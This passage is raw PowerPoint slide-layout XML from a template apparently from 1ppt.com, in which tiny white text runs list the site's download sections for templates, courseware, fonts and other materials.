              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout155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55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55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55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5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56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56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56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56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56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56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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout156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56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56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56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5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57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57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57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57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57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57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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout157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57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57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57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5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58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58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58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58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58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58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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
